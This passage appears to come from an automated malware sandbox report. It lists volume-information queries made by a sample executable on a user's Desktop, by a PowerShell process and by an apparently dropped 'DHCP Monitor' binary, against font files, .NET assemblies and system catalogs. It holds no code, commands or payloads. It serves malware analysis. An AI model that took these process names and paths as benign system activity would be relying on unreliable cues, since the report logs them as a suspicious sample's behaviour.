        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Users\user\Desktop\U7Ncg7oAyC.exe VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Users\user\Desktop\U7Ncg7oAyC.exe VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
